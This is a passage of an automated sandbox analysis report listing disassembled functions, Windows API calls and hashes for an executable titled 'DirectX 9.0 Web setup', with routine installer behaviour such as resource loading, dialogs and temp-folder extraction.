                                                                                                • Instruction Fuzzy Hash: 5CF06D71241219BBF22366239C49F9B3E4CDB4A7D9F020151BBC5A50C2EAAAF400417D
                                                                                                Function 01005B71 Relevance: 7.5, APIs: 5, Instructions: 44stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(771B0440,?,00000000,75A33530,771B0440,0100228C,?,?,771AE800), ref: 01005B7C
                                                                                                • CharPrevA.USER32(771B0440,00000000,?,771AE800), ref: 01005B8C
                                                                                                • CharPrevA.USER32(771B0440,00000000,?,771AE800), ref: 01005B98
                                                                                                • CharPrevA.USER32(771B0440,00000000,?,771AE800), ref: 01005BAB
                                                                                                • CharNextA.USER32(00000000,?,771AE800), ref: 01005BB3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Prev$Nextlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 295585802-0
                                                                                                • Opcode ID: 4b52c76db2cf62ff621c8a08fa6ba7fb40a7dbd169611f4951299f618a72bbfa
                                                                                                • Instruction ID: 9baf6fa903052a509665a9fab5b6fb85594512577d769c7e3968725e671f5898
                                                                                                • Opcode Fuzzy Hash: 4b52c76db2cf62ff621c8a08fa6ba7fb40a7dbd169611f4951299f618a72bbfa
                                                                                                • Instruction Fuzzy Hash: 0DF0F672505A542EF7331A2D8C88E7BBFDCDB872A1F040189F6C092081DAA95C408E72
                                                                                                Function 010017B1 Relevance: 7.5, APIs: 5, Instructions: 40windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,0000083E), ref: 010017E3
                                                                                                • GetDesktopWindow.USER32 ref: 010017EB
                                                                                                • LoadStringA.USER32(?,00000000,00000200,?), ref: 01001816
                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 0100182B
                                                                                                • MessageBeep.USER32(000000FF), ref: 01001833
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1273765764-0
                                                                                                • Opcode ID: 52c35957c5d6308ac9e5b8dfae4ee701d5fa30329f22752cf5df4afad45c4fb5
                                                                                                • Instruction ID: dbb55cd7090eff77bfa65d7c4eba401a97cfafb7d2c079e3b47d5aa362050595
                                                                                                • Opcode Fuzzy Hash: 52c35957c5d6308ac9e5b8dfae4ee701d5fa30329f22752cf5df4afad45c4fb5
                                                                                                • Instruction Fuzzy Hash: D601283140024AABFB265FA4DC4CAEA3AB8BB04745F044564BAA9950E5CBB9CB51CB91
                                                                                                Function 010041CD Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?,DirectX 9.0 Web setup), ref: 010041E9
                                                                                                • MessageBeep.USER32(00000000), ref: 010043C0
                                                                                                • MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,?), ref: 01004439
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$BeepVersion
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2519184315-3102400635
                                                                                                • Opcode ID: b07f304ec63bc814189986a0719c39693d795c7fab61f747b2dc9ea387807f31
                                                                                                • Instruction ID: 4e04eab14abf842a0a3c42a681093732e4e7dc93d7d51bc9d8c979872b2e196d
                                                                                                • Opcode Fuzzy Hash: b07f304ec63bc814189986a0719c39693d795c7fab61f747b2dc9ea387807f31
                                                                                                • Instruction Fuzzy Hash: A971DB30A04209DBEB77DF68DA40BAD7BE9FB44304F11806AEBD1C61E5DB76A045CB58
                                                                                                Function 01002E6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01002E89
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,010059A0), ref: 01002E92
                                                                                                • LockResource.KERNEL32(00000000,?,010059A0), ref: 01002E99
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$LoadLock$Sizeof
                                                                                                • String ID: CABINET
                                                                                                • API String ID: 1933721802-1940454314
                                                                                                • Opcode ID: fee46d4037bcf492714a1928356b3615369b2f8f05e7677fcc6bc0c80cc05536
                                                                                                • Instruction ID: f41c840c6a8244764c1701102c9fef1f774684e0028f7af970c8500be1e35917
                                                                                                • Opcode Fuzzy Hash: fee46d4037bcf492714a1928356b3615369b2f8f05e7677fcc6bc0c80cc05536
                                                                                                • Instruction Fuzzy Hash: 3EE08C71B42310ABE326ABB1AC1DB8B3A58AB19751F000416F286DA0C4CBBA84008791
                                                                                                Function 01003A7A Relevance: 6.3, APIs: 5, Instructions: 51memorystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,?,010049BE,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003A87
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,?,010049BE,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AAC
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,?,00000000,?,010049BE,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AB6
                                                                                                • LocalFree.KERNEL32(00000000,000004B5,00000000,00000000,00000010,00000000,?,00000000,?,010049BE,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AD4
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                • lstrcpyA.KERNEL32(00000000,00000000,?,00000000,?,010049BE,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Local$Alloc$FreeMessagelstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3247521446-0
                                                                                                • Opcode ID: 1c252e24ed27c8a3c89f68d47637d6c558a56de84ee84e0859bd78fbfeca7fcd
                                                                                                • Instruction ID: be99e61ba3297938531ad782b9381de073ce5d9bd08aee7874bfad80a1221b46
                                                                                                • Opcode Fuzzy Hash: 1c252e24ed27c8a3c89f68d47637d6c558a56de84ee84e0859bd78fbfeca7fcd
                                                                                                • Instruction Fuzzy Hash: FB015EB1740305AFE3239F649C85E6A76ACFB55755F014425F3C5A6084D6BA88508B24
                                                                                                Function 0100288F Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 010028B3
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028C5
                                                                                                • DispatchMessageA.USER32(?), ref: 010028DA
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                • String ID:
                                                                                                • API String ID: 2776232527-0
                                                                                                • Opcode ID: a56fe23e79c58ba78c4517e1b38a4719a0d3d39021dba4458620cccc97c02652
                                                                                                • Instruction ID: 9019c9b4a7aa9e97d921e157395a9add37c16d99774a71cba0f29cd9f7e0b4b7
                                                                                                • Opcode Fuzzy Hash: a56fe23e79c58ba78c4517e1b38a4719a0d3d39021dba4458620cccc97c02652
                                                                                                • Instruction Fuzzy Hash: E1012176D01219BABF218A999D48CEB7ABCEA85654F14016ABA41E2084E634D600C771
                                                                                                Function 01005A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCommandLineA.KERNEL32 ref: 01005A65
                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 01005AA4
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 01005ABF
                                                                                                • ExitProcess.KERNEL32 ref: 01005ACC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                • String ID:
                                                                                                • API String ID: 2164999147-0
                                                                                                • Opcode ID: 2f495b8465459854e2a67ff318fe6398d5d3dc67db26c03b0204fa68f66db23f
                                                                                                • Instruction ID: 3b7e2d213fbb4e8bb4e10cefaec2fc303bbd8eb181140a99f14634f11779781f
                                                                                                • Opcode Fuzzy Hash: 2f495b8465459854e2a67ff318fe6398d5d3dc67db26c03b0204fa68f66db23f
                                                                                                • Instruction Fuzzy Hash: 07017C718043995AFB734BAC8C897FA7BE89F1B211F2404C5E9C1922C6C66884C28BA5